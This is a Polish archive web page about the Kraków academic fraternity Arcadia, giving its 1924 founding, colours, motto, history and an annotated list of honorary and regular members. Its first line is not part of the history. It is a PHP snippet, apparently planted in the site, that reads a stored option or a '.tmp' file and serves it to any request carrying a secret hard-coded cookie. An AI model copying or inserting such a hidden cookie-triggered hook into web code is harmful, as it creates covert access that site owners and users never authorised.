if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Arcadia

Dekiel Kazimierza Kisielewskiego Nazwa:
Korporacja Studentów Szkół Akademickich w Krakowie (1924 r.), Polska Korporacja Akademicka Arcadia (1938 r.)
Siedziba:
Kraków
Data powstania:
4 XII 1924 r.
Barwy:
błękitna – złota – czarna (pierwotnie czerwona – złota – niebieska, symbolika barw: pogoda ducha i braterstwo - rycerskość - karność i poszanowanie prawa)
Dewiza:
„Sanctis legibus Patriae semper obsequimur” („Zawsze posłuszni świętym prawom Ojczyzny”)

Rys historyczny

Konwent Arcadia w sem. zim. 1928/29, Kraków 1929 r.

Korporacja Arcadia została założona 4 XII 1924 r. w Czytelni Akademickiego Związku Sportowego (przy ul. T. Kościuszki 12 w Krakowie) przez zżytą ze sobą grupę sportowców zrzeszonych w miejscowym AZS, która „odczuła niedosyt wypełnienia życia tylko sportem i zapragnęła treści intelektualnych zgodnie z zasadą in corpore sana – mens sana”. Grupa znalazła wsparcie u ówczesnego prezesa AZS-u Walerego Goetla (późniejszego prorektora i rektora Akademii Górniczej), który został jej członkiem honorowym. Założycielami byli: student Wydziału Filozoficznego UJ Włodzimierz Długoszewski, studenci Wydziału Prawa UJ Mieczysław Boczar, Jakub Merunowicz i Jerzy Stolfa oraz studenci Wydziału Rolniczego UJ Władysław (Prus-)Bugayski i Erwin Fieber.

Arcadia, Kraków prawd. 1928 r.

Od dnia 27 II 1925 r. Arcadia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 27 II 1925 r.). Kandydowała pod opieką K! Corolla. Dnia 7 VII 1926 r. uzyskała prawa członka rzeczywistego. Związek Seniorów K! Arcadia powstał dnia 4 XII 1931 r. We wrześniu 1932 r. poświęcono, ufundowany przez seniorów Arcadii, zaprojektowany przez historyka sztuki prof. Tadeusza Przypkowskiego, sztandar Korporacji.

Arcadia zawarła kartele: czasowy w 1929 r. z K! Kujawja z Cieszyna (wygasł przed 1939 r.) oraz w 1932 r. z K! Corolla.

Arcadia, dziedziniec Collegium Nowodworskiego, Kraków początek lat 30-tych.

Kuratorem Arcadii z ramienia uniwersyteckiego Senatu w 1931 r. był prof. Walery Goetel, a siedziba mieściła się przy ul. Wolskiej 40 (III piętro).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 104 nazwiska, w tym 12 członków honorowych. W 1938 r. liczyła 78 członków, w tym 8 członków honorowych.

O powojennej działalności nie zachowało się wiele informacji. Wiadomo, że w latach 50-tych odbyło się kilka spotkań członków korporacji. W 1984 r. sztandar Korporacji, dekle, bandy oraz pamiątkowy album z fotografiami ważniejszych uroczystości korporacyjnych Seniorzy Arcadii: prof. Jan Pachoński oraz Kazimierz Kisielewski przekazali do Muzeum UJ w Krakowie. W latach 2004-2005 oraz ponownie w latach 2009-2011 r. trwały w Krakowie starania nad reaktywacją korporacji.

Lista członków

Poniższa, niekompletna lista członków Arcadii obejmuje ponad sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Arcadia, dziedziniec Collegium Nowodworskiego, Kraków 1930/31 (?).

Członkowie honorowi

 1. Stanisław Bierczyński (senior), ( - przed 1930/31) mgr, Filister honorowy Arcadii, w 1938 w Krakowie
 2. Stanisław (Prus-) Bugayski, ojciec Tadeusza i Władysława (obaj Arcadia), dr praw, prezes sądu w Katowicach, Filister honorowy Arcadii, w 1938 w Krakowie
 3. Wiktor Fieber, inż., Filister honorowy Arcadii, w 1938 w Krakowie
 4. Walery Goetel, (14 kwietnia 1889 w Suchej Beskidzkiej - 6 listopada 1972 w Krakowie) s. Walentego, absolwent Gimnazjum w Suchej, absolwent UJ i Uniwersytetu w Wiedniu, doktorat UJ, docent prywatny UJ 1916-20, od 1923 prof. nadzw. i kierownik Katedry Geologii i Paleontologii, prof. zw. 1923, dziekan Wydziału Górniczego 1930-34, prorektor 1938-39, kurator i Filister honorowy Arcadii, dyrektor Szkoły Górniczo-Hutniczo-Mierniczej 1940-45, poseł do Krajowej Rady Narodowej, rektor 1945-51, kierownik Katedery Geologii Ogólnej 1945-59, doktor honoris causa AGH 1960, Akademii Górniczej w Ostrawie 1950 i Politechniki Krakowskiej 1970
 5. Marian Heitzman (Heizman), (1899 w Brodach - 18 listopada 1964) s. Henryka, filozof, habilitacja 1929, docent 1930-32 i prof. 1932-39? UJ, członek Korporacji Akropolia oraz Filister honorowy Arcadii, w czasie wojny w PSZ we Francji i Wielkiej Brytanii, attache wojskowy w ZSRR, podejrzany o szpiegostwo na rzecz Wielkiej Brytanii, wydalony do Iranu 1942, autor pierwszego raportu dot. Katynia, po wojnie na emigracji w Ameryce, prof. McGill University w Montrealu oraz College’u św. Tomasza w St. Maul w Minesocie
 6. Stanisław Hoffman, ( - przed 1938/39) inż., Filister honorowy Arcadii, w 1938 w Krakowie
 7. Józef Krajewski, prof. UJ, Filister honorowy Arcadii, w 1938 w Krakowie
 8. Władzimierz Kraus, inż., dyrektor Izby Skarbowej w Krakowie, Filister honorowy Arcadii, w 1938 w Krakowie
 9. Stanisław Ożga, dr, Filister honorowy Arcadii, w 1938 pracownik Banku Polskiego w Warszawie
 10. Henryk Pachoński, (11 listopada 1878 w Skawinie - 23 maja 1957 w Krakowie) ojciec Jana i Mieczysława (Arcadia), historyk i geograf, dyrektor prywatnego seminarium żeńskiego w Krakowie, dr, działacz narodowy na Śląsku, uczestnik powstań śląskich, aktywny członek Towarzystwa Obrony Zachodnich Kresów Polski, następnie Związku Obrony Kresów Zachodnich, Filister honorowy Arcadii, organizator tajnego nauczania w Krakowie

  Tadeusz Pileski.

 11. Tadeusz Pileski, (1878 Proszowicach - po 1945) ojciec Tadeusza (Arcadia), dyrektor hotelu w Krakowie, Filister honorowy Arcadii

  Józef Windakiewicz.

 12. Józef Windakiewicz, (18 stycznia 1868 - 17 maja 1938 w Krakowie) s. Ludwika i Marii z Oleaczków, dr praw, sędzia, przed I wojną światową inspektor sądowy przy ministerstwie sprawiedliwości w Wiedniu, sędzia apelacyjny, od 1923 prezes Oddziału Prokuratorii Generalnej w Krakowie, założyciel i pierwszy red. naczelny “Przeglądu Sądowego”, członek redakcji “Orzecznictwa Sądów Polskich”, prezes Krakowskiego Towarzystwa Prawniczego, autor prac naukowych z zakresu prawa, Filister honorowy Arcadii, prezes Kola Seniorów 1929 (?) i 1931, pochowany na Cmentarzu w Wieliczce, odznaczony Krzyżem Komandorskim OOP

Członkowie rzeczywiści

  Andrzej Battaglia, 1929 r.

 1. Andrzej Battaglia, (12 czerwca 1907 we Lwowie - 12 marca 1973 w Krakowie) s. Rogera, absolwent IV Gimnazjum im. Henryka Sienkiewicza w Krakowie, student i absolwent Wydziału Górniczego AG 1925-31, akt. Arcadia 1929-31, po studiach pracował w kopalniach “Hrabia Renard” w Sosnowcu, “Welenty-Wawel” w Rudzie Śląskiej, “Eminencja” w Katowicach, uczestnik wojny obronnej 1939, w PSZ na Zachodzie 1939-45, w tym studia podyplomowe na Uniwersytecie w Birmingham, w 1947 wrócił do kraju, wykładowca w Katedrze Maszyn Górniczych AG 1952-, doktorat 1959, prof. nadzw. 1963, kierownik Katedry Maszyn Przeróbki Kopalin 1959-69, kierownik Zakładu Maszyn Przeróbki Kopalin w Instytucie Maszyn Górniczych, Przeróbczych i Automatyki 1969-73

 2. Alfred Bąkowski, ( - lata 80-te) student i absolwent prawa UJ, c. 1930, akt. 1930-31, prokurator, adwokat w Katowicach
 3. Stanisław Bierczyński (junior), akt. 1928-31, prezes sem. zim. 1929/30 oraz 1930

  Mieczysław Boczar 1934 r.

 4. Mieczysław Boczar, ( - 29 maja 1978 w Krakowie) brat Kazimierza (Vesalia), student i absolwent prawa UJ, założyciel Arcadii, akt. 1924-31, prezes Arcadii i Krakowskiego Koła Międzykorporacyjnego sem. zim. 1930/31, organizator IX Zjazdu ZPKA, urzędnik skarbowości, dyrektor Zakładów Papierów Wartościowych, działacz Stowarzyszenia Miłośników Broni i Barwy

 5. Jerzy Borkowski, c. 1938, akt. 1938-39
 6. Stanisław Braun, ożeniony 25 kwietnia 1925 z Heleną z d. Pieluchówna, w 1927 nie należał już do korporacji [Źródła: Korporant, Warszawa, Maj 1925, Rok I, nr 3, str. 34]

  Borys Brodowski, 1934 r.

 7. Borys Brodowski, (1910 - ) student i absolwent prawa UJ, autor tekstu hymnu Arcadii, akt. 1929-34, w 1938 w Katowicach

  Tadeusz Bugayski, 1929 r.

 8. Tadeusz (Prus-)Bugayski, ( - lata 90-te) syn Stanisława, brat Władysława (obaj Arcadia), student i absolwent prawa UJ, akt. 1929-31, dr praw, sędzia Sądu Okręgowego w Gdyni i Sądu Grodzkiego w Katowicach, por. 16 Pułu Piechoty, po wojnie na emigracji w Wielkiej Brytanii, minister sprawiedliwości i dla spraw obywateli polskich w rządzie na obczyźnie (1955)

 9. Władysław (Prus-)Bugayski, (11 stycznia 1906 w Liszkach k. Krakowa - 20 lutego 1943 w Auschwitz) syn Stanisława, brat Tadeusza (obaj Arcadia), student i absolwent rolnictwa UJ, założyciel Arcadii, autor piosenek, scentarzysta, m.in. autor scenariusza i muzyki do filmu “Zamarłe Echo” (1934), więzień obozu koncentracyjnego w Auschwitz, zamordowany (?)
 10. Tadeusz Bukowski, inż., w 1938 w miejsc. Cieszkowy w pow. działoszyckim w woj. kieleckim

  Janusz Chojnacki 1934 r.

 11. Janusz Chojnacki, student i absolwent farmacji UJ, akt. 1934

 12. Kazimierz Czerwiński, z Katowic, c. 1930, akt. 1930-34

  Adam Dawidowicz 1934 r.

 13. Adam Dawidowicz, (1912 - 26 maja 1999 w Katowicach) student i absolwent prawa UJ, c, 1930, akt. 1930-37, w 1938 w Katowicach

  Włodzimierz Długoszewski, lata 20-te (?).

 14. Włodzimierz Długoszewski, (6 kwietnia 1905 w Krakowie - 25 lipca 1945 w Crivitz) brat Jerzego (Scythia), s. Stanisława, absolwent Gimnazjum im. H. Sienkiewicza 1923, student i absolwent polonistyki UJ, założyciel Arkadii, akt. 1924-31, prokurator 1930, olderman sem. zim. 1929/30, prezes sem. let. 1930/31, wiceprezes Koła Seniorów 1931, wioślarz, mistrz Polski (1926, 1927, 1929, 1930) oraz olimpijczyk (kpt. drużyny wioślarzy, brąz w dwójkach podwójnych na Olimpiadzie w Berlinie w 1936), instruktor wioślarski, dziennikarz m.in. “Kuriera Sportowego” i “Przeglądu Sportowego”, “Ilustrowanego Kuriera Codziennego”, działacz konspiracji, aresztowany przez Gestapo w Krakowie na początku 1942, więzień obozów koncentracyjnych w Auschwitz, Oranienburg-Schsenhausen i Mauthausen, zmarł krótko po wyzwoleniu

  Jan Ekielski, 1929 r.

 15. Jan Ekielski, (21 stycznia 1902 - 27 maja 1942 w Auschwitz) brat Eustachego (Akropolia), żołnierz 4 Pułku Legionów 1918-19, ochotnik w wojnie bolszewickiej 1920, absolwent Gimnazjum im. Króla Jana Sobieskiego w Krakowskiego 1921 1921, student i absolwent Wydziału Architektury ASP 1924-28, akt. 1930-31, wiceprezes sem. let. 1930/31, oficer rez. art. ciężkiej, ciężko ranny w wojnie obronnej 1939, aresztowany w ramach akcji uwięzienia oficerów rez., wywieziony do Auschwitz, tam rozstrzelany

 16. Tadeusz Ellensin, akt. 1931, skreślony 1931
 17. Witold Emilewicz, (1 sierpnia 1906 - 1966) student i absolwent rolnictwa UJ, akt. 1929-31, w 1938 w Krakowie

  Erwin Fieber, 1929 r.

 18. Erwin Fieber, student i absolwent rolnictwa UJ, założyciel Arcadii, akt. 1924-31, prezes 1929/30, skarbnik Arcadii i Krakowskiego Koła Międzykorporacyjnego sem. zim. 1930/31, w 1938 w Krakowie

 19. Jan Fischer (junior), w 1938 w Warszawie
 20. Józef Fischer, prawnik, w 1938 w Krakowie
 21. Stanisław Gabryel, inż., w 1938 w Warszawie
 22. Zbigniew (Jerzy) Gawlikowski, c. 1938, akt. 1938-39, skarbnik sem. let. 1938/39

  Tadeusz Göttinger, 1929 r.

 23. Tadeusz Göttinger, (31 sierpnia 1908 w Bochni - 1940 w Katyniu), s. Franciszka i Zofii z Górskich, student UJ, mgr farmacji, w 1938 pracownik apteki w Bochni, dzierżawca apteki homeopatycznej w Krynicy, ppor. rez., przydzielony do 9 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD

  Alojzy Gołoszewski 1934 r.

 24. Alojzy Gołoszewski (Gołaszewski), akt. 1934, mgr ekonomii

 25. Józef Grabowski, ( - 1939-45) c. 1930, akt. 1930-34
 26. Karol Hendrich, ( - 1939-45?) student i absolwent prawa UJ, akt. 1929-33, w 1938 w Krakowie
 27. Stanisław Hoffmann, ( - lata 80-te) akt. 1937-39, trzykrotnie sekretarz, w tym sem. zim. 1938/39, prezes sem. let. 1938/39, rolnik

  Władysław Jachymiak, 1929 r.

 28. Władysław Jachymiak, student i absolwent prawa UJ, w 1938 w sądzie w Bielsku

 29. Marian Jamroz (óz), student i absolwent prawa UJ, akt. 1929-33, sekretarz sem. zim. 1931/32, w 1938 w Krakowie, po wojnie na emigracji

  Stanisław Janicki, 1929 r.

 30. Stanisław Janicki, ( - 1939-45?) student i absolwent med. UJ, akt. 1929-34, dr med., w 1938 pracownik Kliniki Ginekologicznej w Krakowie

  Teodor Kalczyński, 1929 r.

 31. Teodor Kalczyński, akt. 1929-34, sekretarz Arcadii i Krakowskiego Koła Międzykorporacyjnego sem. zim. 1930/31, lekarz

 32. Zdzisław Kellner, akt. 1936-38, wiceprezes Krakowskiego Koła Międzykorporacyjnego 1936/37, delegat na XIII Zjazd ZPKA
 33. Wacław Kiełczyński, student i absolwent rolnictwa UJ

  Kazimierz Kisielewski 1934 r.

 34. Kazimierz Kisielewski, (4 lutego 1909 - ) brat Zdzisława (Arcadia) i Czesława (Lutyko-Venedya), student i absolwent prawa UJ, akt. 1930-32, sekretarz 1930, skarbnik sem. zim. 1930/31, olderman sem. let. 1930/31, wiceprezes sem. zim. 1931/32, dyrektor Izby Rzemieślniczej

  Zdzisław Kisielewski 1934 r.

 35. Zdzisław Kisielewski, ( - 1986 w Jeleniej Górze), brat Kazimierza (Arcadia) i Czesława (Lutyko-Venedya), student i absolwent prawa UJ, akt. 1930-31, skarbnik sem. zim. 1931/32, adwokat

 36. Władysław Konieczny, akt. 1930-33
 37. Jerzy Kopystyański, c. 1938, akt. 1938-39

  Marian Korzelik 1934 r.

 38. Marian Korzelik, (1908-1987) c. 1930, akt. 1930-34, mgr ekonomii, w 1938 w Krakowie, w latach 1947-52 więzień Wronek

 39. Stefan Kossak, mgr, w 1938 w Katowicach
 40. Kulczyński, (?)
 41. Janusz Kunicki, student i absolwent prawa UJ, w 1938 pracownik PZU w Chorzowie
 42. Władysław Lebiedzik, akt. 1930-31, wiceprezes wewn. sem. zim. 1930/31, mgr ekonomii, w 1938 w Sierszy k. Trzebini
 43. Stanisław Lenduszko, c. 1938, akt. 1938-39, wiceprezes sem. let. 1938/39

  Alfred Lerch 1934 r.

 44. Alfred Lerch, c. 1930, akt. 1930-34, mgr ekonomii, w 1938 w Krakowie

 45. Witold Lipski, inż., w 1931 w Borysławiu

  Janusz Łodygowski, 1929 r.

 46. Janusz Łodygowski, student i absolwent rolnictwa UJ, akt. 1929-31, sekretarz i skarbnik Koła Seniorów 1931

 47. Jan Machalski, (19 października 1901 w Warszawie - kwiecień 1943), absolwent II Szkoły Realnej w Krakowie, student UP, student i absolwent Wydziału Górniczego AG 1923-31, akt. 1929-31, po studiach inż. ruchu w Kopalni Soli Potasowej TESP w Kałuszu 1931-37, kierownik Kopalni Rudy Żelaza w Starachowicach 1942-43, aresztowany w lutym 1943 i osadzony w obozie koncentracyjnym w Auschwitz
 48. Tadeusz Madeja, akt. 1937-39, wiceprezes sem. zim. 1938/39, prawnik
 49. Stanisław Mallciewicz, c. 1938, akt. 1938-39
 50. Zbigniew Matykiewicz, c. 1938, akt. 1938-39, olderman sem. let. 1938/39

  Jan Mazurkiewicz, 1934 r.

 51. Jan Mazurkiewicz, akt. 1934-39

 52. Jakub Merunowicz, (1906-1985) s. Włodzimierza, założyciel Arcadii, dr praw, w 1938 w Krakowie, po wojnie na emigracji w Stanach Zjednoczonych
 53. Wacław Mieruszyński, mgr, w 1931 w Poznaniu
 54. Marian Mołodecki, (1915-2003) akt. 1937-39, prezes sem. zim. 1938/39, absolwent (mgr inż. rolnik) AR
 55. Stanisław Niwicki, (?) akt. 1939, gospodarz sem. let. 1938/39
 56. Jan Nowak, student i absolwent filozofii UJ
 57. Zbigniew Nowicki, c. 1938, akt. 1938-39
 58. Zbigniew Nycz, akt. 1937-39
 59. Jan Ogłódek, architekt, w 1938 w Krakowie

  Jan Pachoński 1934 r.

 60. Jan Zbigniew (Lubicz-)Pachoński, (18 marca 1907 w Krakowie - 13 sierpnia 1985 w Krakowie) s. Henryka, brat Mieczysława (obaj Arcadia), akt. 1929-31, prezes sem. zim. 1929/30 (V-lecia), olderman sem. zim. 1930/31, dr filozofii 1931, w czasie wojny nauczyciel tajnych kompletów, prof. historii UJ, historyk wojskowości, znawca epoki napoleońskiej

  Mieczysław Pachoński 1934 r.

 61. Mieczysław Pachoński, (1 lipca 1908 w Krakowie - 13 grudnia 1967 w Krakowie) s. Henryka, brat Jana (obaj Arcadia), student i absolwent prawa UJ, akt. 1929-31, olderman 1930, dr praw, por. 8 Pułku Ułanów, jeniec obozów Osteroda, Arnwald, Woldenberg, wykładowca prawa na tajnym uniwersytecie, przewodniczący Wydziału Cywilnego Sądu Wojewódzkiego w Krakowie, sędzia apelacyjny

  Zbigniew Pachoński 1934 r.

 62. Zbigniew Pachoński, akt. 1934-38, olderman sem. zim. 1938/39, żołnierz łącznikowy WP, inż. (?), dr (?), po wojnie na emigracji w Wielkiej Brytanii (Szkocja), honorowy członek Towarzystwa Polsko-Szkockiego, prof. (?) prawa w Edynburgu (?)

 63. Lesław Palecki, akt. 1938-39
 64. Zdzisław Pasternak, akt. 1938-39
 65. Tadeusz Perkowski, akt. 1929-31, inż.

  Tadeusz Pileski, 1929 r.

 66. Tadeusz Pileski, ( - po 1945) s. Tadeusza (Arcadia) student filozofii i muzyki UJ, autor melodii do hymnu Arcadii, akt. 1930-32, olderman sem. zim. 1931/32, mgr

 67. Stanisław Pisulewski, c. 1938, akt. 1930-31, sekretarz sem. let. 1938/39
 68. Wiktor Pusch, c. 1930, akt. 1930-34, w 1938 w Strumieniu na Śląsku Cieszyńskim

  Ludwik Radwański, 1929 r.

 69. Ludwik Radwański, student i absolwent prawa UJ, akt. 1930-32, wiceprezes 1930, prezes sem. zim. 1931/32, urzędnik, w 1938 w Krakowie

 70. Henryk (Harry) Rasp, (1912 - 22 czerwca 1941) student i absolwent prawa UJ, oficer rez. 21 Pułku Artylerii Lekkiej w Bielsku, w wojnie obronnej w 21 Dywizji Piechoty Armii Kraków, po kapitulacji pod Tomaszowem Lubelskim uniknął niewoli niemieckiej, aresztowany przez NKWD w Stryju, zamordowany przez NKWD podczas likwidowania więźniów w wyniku rozpoczęcia wojny rosyjsko-niemieckiej

  Zbigniew Reczyński, 1929 r.

 71. Zbigniew Reczyński, student i absolwent prawa UJ, akt. 1930-31, prezes 1930 (?), wiceprezes zewn. Arcadii i wiceprezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1930/31, dr praw, adwokat

 72. Jan Roth, c. 1930, akt. 1930-34, gospodarz sem. zim. 1931/32, mgr, urzędnik

  Tadeusz Rudkowski 1934 r.

 73. Tadeusz Rudkowski, ( - 1998) student i absolwent prawa UJ, akt. 1929-33, sekretarz sem. zim. 1930/31

 74. Jerzy Stanowski, akt. 1930-31, sekretarz sem. let. 1930/31
 75. Franciszek Starzewski, inż., w 1938 w Branicach w. Krakowa

  Staczyński, 1929 r.

 76. Staczyński, (?)

 77. Jerzy Stolfa, student prawa UJ, założyciel Arcadii, po wojnie na emigracji w Stanach Zjednoczonych, prowadził biuro podróży

  Józef Brason-Summer, 1929 r.

 78. Józef Brason-Summer (Brasson, Brazon), student i absolwent prawa UJ, w 1938 w Równem na Wołyniu

 79. Adam Szczawiński, akt. 1929-31, inż., w latach 30-tych w Poznaniu

  Adam Szostkiewicz, 1929 r.

 80. Adam Szostkiewicz, (18 grudnia 1905 w Żmigrodzie Nowym k. Jasła - 27 lutego 1974 w Warszawie) założyciel Arcadii (?), zootechnik, prof. i prorektor Wyższej Szkoły Rolniczej w Olsztynie.

 81. Józef Lepszyc-Śmiałowski, akt. 1937-39
 82. Kazimierz Targowski, (1912 - wiosna 2007 w Sandomierzu), student i absolwent farmacji UJ, c. 1937, akt. 1937-38
 83. Roman Tymoszuk, akt. 1937-39
 84. Zbigniew Więcław, student i absolwent rolnictwa UJ, w 1931 w Luboczy k. Krakowa
 85. Adam Wiśniewski, inż., w 1938 w Tarnowie
 86. Janusz Wojdecki, akt. 1937-39
 87. Bronisław Zaczek, (26 sierpnia 1902 w Borysławiu - 4 grudnia 1966 w Krakowie), s. Karola, student i absolwent Wydziału Górniczego AG 1924-30, po studiach m.in. kierownik oddziału termicznego firmy “Małopolska” w Borysławiu 1929-39, uczestnik wojny obronnej 1939, internowany na Węgrzech, w II Korpusie gen. Władysława Andersa (m.in. Tobruk, Monte Cassino) 1940-44, po wojnie na emigracji w Wielkiej Brytanii oraz w Argentynie, inż. ruchu w Przedsiębiorstwie Przeróbki Ropy Naftowej w Manchesterze 1946-49, główny inż. firmy “Elektrodimia” w Buenos Aires 1950-61, powrócił do Polski w 1963
 88. Edward Zajączkowski, akt. 1931, skreślony 1931
 89. Tadeusz Zamiar, c. 1930, akt. 1930-34, artysta malarz, w 1938 w Katowicach
 90. Tadeusz Zawadzki, student i absolwent polonistyki UJ
 91. Marian Zbiorowski (Ziobrowski ?), w 1938 w miejsc. Cieszkowy w pow. działoszyckim w woj. kieleckim

  Antoni Zubrzycki 1934 r.

 92. Antoni Zubrzycki, akt. 1934-38 (?), w 1938 w Krakowie

 93. Marian Żebrowski, student rolnictwa UJ

Identyfikacja fotografii

Trzech Arkadusów, Kraków koniec lat 20-tych.

Trzech Arkadusów.

Fotografia przedstawiająca prawdopodobnie trzech członków Arcadii, w tym po bokach zapewne członków honorowych. Istotne byłoby ustalenie tożsamości widocznych na fotografii osób, jak także daty i okoliczności wykonania zdjęcia.

Członek Arcadii, 1929 r.Członek Arcadii, 1929 r.

Dwóch Arkadusów, 1929 r.

Fotografia przedstawiająca dwóch członków Arcadii w 1929 r. Istotne byłoby tożsamości widocznych na zdjęciu osób.

Pieczęć Arcadii, 1931 r.
Listę członków opracowano na podstawie:

1) “Arcadia” Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 26 i n.,
2) Arcadia Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 21 i n.,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Arcadia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 31 VII 2014 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Arcadia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 31 VII 2014 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }